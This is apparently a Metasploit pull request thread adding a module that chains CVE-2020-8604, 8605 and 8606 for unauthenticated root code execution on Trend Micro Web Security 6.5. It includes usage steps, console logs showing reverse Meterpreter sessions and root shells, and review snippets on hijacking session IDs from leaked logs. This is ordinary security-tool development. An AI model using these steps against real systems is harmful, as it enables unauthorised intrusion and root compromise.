Add Trend Micro WebSecurity Remote Code Execution
rapid7/metasploit-framework pull request #13645
Opened 2020-06-14 17:41 UTC by mdisec

Hi everyone !

This module exploits multiple vulnerabilities together in order to achieve a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user.

## Verification Steps

A successful check of the exploit will look like this:

- [ ] Start `msfconsole`
- [ ] Run `use exploit/linux/http/trendmicro_websecurity_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target is vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console.

## Scenerio

This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852.

```
msf5 > use exploit/linux/http/trendmicro_websecurity_exec
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31
RHOSTS => 192.168.74.31
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.27.199.6
LHOST => 172.27.199.6
msf5 exploit(linux/http/trendmicro_websecurity_exec) > check
[+] 192.168.74.31:8443 - The target is vulnerable.
msf5 exploit(linux/http/trendmicro_websecurity_exec) > exploit

[*] Started reverse TCP handler on 172.27.199.6:4444
[*] Exploiting command injection vulnerability
[+] Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858
[*] Sending stage (53755 bytes) to 172.27.192.1
[*] Meterpreter session 1 opened (172.27.199.6:4444 -> 172.27.192.1:55842) at 2020-06-14 20:24:53 +0300

meterpreter > sysinfo
Computer        : trendmicro
OS              : Linux 2.6.32-504.OpenVA.3.5.1375.el6.x86_64 #1 SMP Wed Dec 28 16:16:16 CST 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > shell
Process 6306 created.
Channel 1 created.
sh: no job control in this shell
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),499(iscan)
sh-4.1#
```

#Nahamcon2020

2020-06-14 18:02 UTC, h00die commented
Is this the right download? https://success.trendmicro.com/product-support/interscan-web-security-virtual-appliance-6-5?sfdcIFrameOrigin=null

2020-06-14 19:48 UTC, mdisec commented
> Is this the right download? https://success.trendmicro.com/product-support/interscan-web-security-virtual-appliance-6-5?sfdcIFrameOrigin=null

Yep it's.  There is a download link of the product in the documentation file of the module.

2020-06-14 20:29 UTC, h00die commented on documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
> +2. Find "InterScan Web Security Virtual Appliance)" and click.
stray ) here

2020-06-14 20:31 UTC, h00die commented
i've downloaded the file in case they update the website. i'll see if i can get to looking at this in a few days

2020-06-14 20:32 UTC, bcoles commented on documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
> +This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user.
```suggestion
This module exploits multiple vulnerabilities together in order to achieve remote code execution in Trend Micro Web Security. Unauthenticated users can execute a terminal command under the context of the root user.
```

2020-06-14 20:32 UTC, bcoles commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +  end
There's little purpose in defining this as a method.

2020-06-15 12:53 UTC, mdisec commented
> i've downloaded the file in case they update the website. i'll see if i can get to looking at this in a few days

Awesome !  I will fix grammar and typos with a single commit once I've got full review. @bcoles

2020-06-17 22:15 UTC, h00die commented
My first test run was a bust (never logged into the website):
```
msf5 exploit(linux/http/trendmicro_websecurity_exec) > run

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Trying to extract session ID by exploiting reverse proxy service
[+] Successfully exploited reverse proxy service !
[*] Exploiting command injection vulnerability
[-] Exploit aborted due to failure: unexpected-reply: There is no JSESSIONID in log file.
[*] Exploit completed, but no session was created.
```

While I get now why it didn't work, I think we can work on the language a bit to make it more obvious

2020-06-17 22:31 UTC, h00die commented
Please run msftidy_docs.
```
$ tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md 
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md - [WARNING] Missing Section: ## Scenarios
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md - [WARNING] Missing Section: ## Options
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md - [WARNING] Please add a newline at the end of the file
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md:3 - [WARNING] Line too long (188). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md:5 - [WARNING] Line too long (388). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md:7 - [WARNING] Line too long (209). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md:9 - [WARNING] Line too long (334). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md:25 - [WARNING] Line too long (159). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.

```

2020-06-17 23:52 UTC, h00die commented
I'm not getting any hits on the `JSESSIONID`, however I see this in the logs:
```
Wed Jun 17 18:39:33 GMT-05:00 2020: CheckUserLogon sessionid : 41CA20553E6E0E306F528E998D311C31                                                                                                                                                           
...                                                                                                                                                                                             
Wed Jun 17 18:40:31 GMT-05:00 2020: CheckUserLogon sessionid : 88F8DCAD6A553DA1C31AD6FA29AABA13                                                                                                                                                           
```

Those are valid JSESSIONIDs for my admin user.   Maybe add those to the check? Also, good things to add to the docs so we know what the log items look like.

2020-06-18 00:13 UTC, h00die commented
After making this change:
```
-    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
+    @jsessionid = @res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten.last || ''

```
I was able to get it to run.
```
msf5 exploit(linux/http/trendmicro_websecurity_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Trying to extract session ID by exploiting reverse proxy service
[+] Successfully exploited reverse proxy service !
[*] Exploiting command injection vulnerability
[+] Latest session id is successfully extracted : 8FD70613D35F69406F4D461C2B233C92
[*] Sending stage (53755 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42711) at 2020-06-17 20:07:24 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : trendmicro-iswsva
OS              : Linux 2.6.32-504.OpenVA.3.5.1321.el6.x86_64 #1 SMP Tue Dec 23 15:08:35 CST 2014
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
```

2020-06-18 00:20 UTC, h00die requested changes

2020-06-18 00:20 UTC, h00die commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
why only take the last and not all?
I would say loop through the list, most recent first, so you dont miss any sessions.

2020-06-18 00:20 UTC, h00die commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +
Can you add a print_status here to say something like 'sending command injection'.  if the payload fails, the last output is `[+] Latest session id is successfully extracted : 8FD70613D35F69406F4D461C2B233C92` and it sits there for a while before you realize nothing is happening.

2020-06-18 00:20 UTC, h00die commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +      'DefaultOptions' =>
bind payloads dont seem to be working.  Consider adding something to remove them from the payload list: https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb#L45

2020-06-18 10:01 UTC, mdisec commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +
Actually we have `print_status('Exploiting command injection vulnerability')` on line 144 for that :)

2020-06-18 10:06 UTC, mdisec commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +    else
In that case, this function always returns `CheckCode::Vulnerable` .  Maybe we can call return for the safe.

```
unless @res.code == 200
  return CheckCode::Safe
end
CheckCode::Vulnerable
```

2020-06-18 10:12 UTC, mdisec commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +  end
I have a kind an obsession about DRY:D

2020-06-18 10:14 UTC, mdisec commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +      'DefaultOptions' =>
Ahh yeah, my bad sorry <3 .

2020-06-18 10:17 UTC, h00die commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +    else
pseudo code but yes, you'd need to return the Safe

2020-06-18 10:44 UTC, mdisec commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +      Exploit::CheckCode::Vulnerable
In that case, using `CheckCode::Appears` seems okay for me. Which return code should I use ? I dont want to use vulnerable code because we are checking the status of check function within the exploit function.

```
  def check
    leak_logfile
    unless @res.code == 200
      return CheckCode::Safe
    end

    extract_cookie
    if @jsessionid == "asd"
      return CheckCode::Vulnerable
    end
    print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')
    CheckCode::Appears
  end
```

2020-06-18 10:52 UTC, h00die commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +      Exploit::CheckCode::Vulnerable
haha, i left it out as i was trying to think through the idea and then got distracted.  I looked through the codes, Appears may work for the time being.  @wvu-r7 thoughts on this?

2020-06-18 21:02 UTC, h00die commented
Any idea on the JSESSIONID difference?

```
-    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
+    @jsessionid = @res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten.last || ''
```

2020-06-19 09:50 UTC, mdisec commented
> Any idea on the JSESSIONID difference?
> 
> ```
> -    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
> +    @jsessionid = @res.body.scan(/ /).flatten.last || ''
> ```

That's strange.. On my lab, I've installed all the minor patches too. Maybe, the function that prints out `JSESSIONID=` into the log file does not exist earlier minor version. But `CheckUserLogon sessionid : (.*)` is working on my version too. So I'm switching the regex with that one. THanks alot !

2020-06-19 11:25 UTC, wvu-r7 commented on modules/exploits/linux/http/trendmicro_websecurity_exec.rb
> +      Exploit::CheckCode::Vulnerable
If it's exploiting a vulnerability, it can be `Vulnerable`. `Appears` is typically for version checks.

2020-06-19 16:04 UTC, h00die commented
Let me know when you're all set and I'll take a look

2020-06-19 16:20 UTC, mdisec commented
@h00die Thanks. I think it's ready for review 👍

2020-06-20 14:39 UTC, h00die commented
```
msf5 exploit(linux/http/trendmicro_websecurity_exec) > check

[*] Trying to extract session ID by exploiting reverse proxy service
[+] Extracted number of JSESSIONID : 5
[*] Testing JSESSIONID #0 : 8FD70613D35F69406F4D461C2B233C92
[!] JSESSIONID #0 is inactive ! Moving to the next one.
[*] Testing JSESSIONID #1 : F15C85EC0B9B9C79571BFB22E5ECBDA3
[!] JSESSIONID #1 is inactive ! Moving to the next one.
[*] Testing JSESSIONID #2 : D25037B1BEC34C8E00C7C9307F7962C6
[!] JSESSIONID #2 is inactive ! Moving to the next one.
[*] Testing JSESSIONID #3 : 88F8DCAD6A553DA1C31AD6FA29AABA13
[!] JSESSIONID #3 is inactive ! Moving to the next one.
[*] Testing JSESSIONID #4 : 41CA20553E6E0E306F528E998D311C31
[!] JSESSIONID #4 is inactive ! Moving to the next one.
[-] System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.
[+] 2.2.2.2:8443 - The target is vulnerable.
```

This looks much better :)

2020-06-20 16:09 UTC, h00die commented
Any reason you're using instance variables (@) vs returning the jsessionid?  from a quick look over, it seemed like you could just return it.

Had a few suggestions for fixes: https://github.com/mdisec/metasploit-framework/pull/2

2020-06-20 19:11 UTC, mdisec commented
Thanks for MR @h00die ! I merged it <3.

`hijack_cookie` function has to be called within `check` function. Because people may run `check` before running `exploit`. I like to call the check method within exploit function so that I avoid exploitation attempts against invulnerable targets even if the user didn't use check in the first place. So check function must return checkcode status and we need to know jessionid within exploit method. 

Another approach could be calling `hijack_cookie` within the exploit method and pass the cookie value to the check method. If the function parameter of the check method is empty or nil, that means the user executes `check` before `exploit`. In that case, we can call `hijack_cookie` again within the check method.

For me, both approaches do what we need. But instance variable makes more sense for me in these kinds of situations. Whenever I see an instance variable, I think that variable is important for the exploitation and has to be accessible from multiple functions of the exploit module.

2020-06-22 10:47 UTC, h00die commented
Latest changes are working and looking good.
```
msf5 > use exploit/linux/http/trendmicro_websecurity_exec 
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set verbose true
verbose => true
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 exploit(linux/http/trendmicro_websecurity_exec) > check

[*] Trying to extract session ID by exploiting reverse proxy service
[+] Extracted number of JSESSIONID: 6
[*] Testing JSESSIONID #0 : D678FA4451F551F3882349A718717130
[!] JSESSIONID #0 is inactive! Moving to the next one.
[*] Testing JSESSIONID #1 : 8FD70613D35F69406F4D461C2B233C92
[!] JSESSIONID #1 is inactive! Moving to the next one.
[*] Testing JSESSIONID #2 : F15C85EC0B9B9C79571BFB22E5ECBDA3
[!] JSESSIONID #2 is inactive! Moving to the next one.
[*] Testing JSESSIONID #3 : D25037B1BEC34C8E00C7C9307F7962C6
[!] JSESSIONID #3 is inactive! Moving to the next one.
[*] Testing JSESSIONID #4 : 88F8DCAD6A553DA1C31AD6FA29AABA13
[!] JSESSIONID #4 is inactive! Moving to the next one.
[*] Testing JSESSIONID #5 : 41CA20553E6E0E306F528E998D311C31
[!] JSESSIONID #5 is inactive! Moving to the next one.
[-] System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.
[+] 2.2.2.2:8443 - The target is vulnerable.
```
Logged in to the service
```
msf5 exploit(linux/http/trendmicro_websecurity_exec) > check

[*] Trying to extract session ID by exploiting reverse proxy service
[+] Extracted number of JSESSIONID: 7
[*] Testing JSESSIONID #0 : 37507429D7441C3E8CEC4B1D447C687E
[+] Awesome!!! JESSIONID #0 is active.
[+] 2.2.2.2:8443 - The target is vulnerable.
msf5 exploit(linux/http/trendmicro_websecurity_exec) > exploit 

[-] Exploit failed: One or more options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/trendmicro_websecurity_exec) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(linux/http/trendmicro_websecurity_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Trying to extract session ID by exploiting reverse proxy service
[+] Extracted number of JSESSIONID: 7
[*] Testing JSESSIONID #0 : 37507429D7441C3E8CEC4B1D447C687E
[+] Awesome!!! JESSIONID #0 is active.
[*] Exploiting command injection vulnerability
[*] Sending stage (53755 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59107) at 2020-06-22 06:38:02 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : trendmicro-iswsva
OS              : Linux 2.6.32-504.OpenVA.3.5.1321.el6.x86_64 #1 SMP Tue Dec 23 15:08:35 CST 2014
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
```

2020-06-22 10:54 UTC, merged

2020-06-22 10:56 UTC, h00die commented
# Release Notes
This PR adds an exploit for CVE-2020-8604. CVE-2020-8605, and CVE-2020-8606 which when chained together allow for an RCE in Trend Micro WebSecurity 6.5

2020-06-22 10:57 UTC, h00die commented
Thanks for the PR @mdisec , and sticking with all the changes requested.  It's quite a dynamic module now!

2020-09-13 07:58 UTC, hackercoolmagz commented
Hi, I have downloaded the above vulnerable iso file of web security appliance and installed it in virtualbox. I kept both the attacker (kali) and target(trendmicro) on the same host only network. However I can't access the target port (8443). from my attacker machine. What mistake I am ding here?

2020-09-13 08:41 UTC, bcoles commented
> 
> 
> Hi, I have downloaded the above vulnerable iso file of web security appliance and installed it in virtualbox. I kept both the attacker (kali) and target(trendmicro) on the same host only network. However I can't access the target port (8443). from my attacker machine. What mistake I am ding here?

What output do you get?

This module expects the `PROXY_PORT` to be set (default port `8080`). The module uses this service to gain access to internal services, such as port 8443, as per the documentation:

          Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users
          can exploit this vulnerability in order to communicate with internal services in the product.

2020-09-14 09:59 UTC, hackercoolmagz commented
> > Hi, I have downloaded the above vulnerable iso file of web security appliance and installed it in virtualbox. I kept both the attacker (kali) and target(trendmicro) on the same host only network. However I can't access the target port (8443). from my attacker machine. What mistake I am ding here?
> 
> What output do you get?
> 
> This module expects the `PROXY_PORT` to be set (default port `8080`). The module uses this service to gain access to internal services, such as port 8443, as per the documentation:
> 
> ```
>       Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users
>       can exploit this vulnerability in order to communicate with internal services in the product.
> ```

Hi, Thanks for your quick reply. But the module worked as mentioned after restarting the Trend Micro web security appliance. So the problem is solved.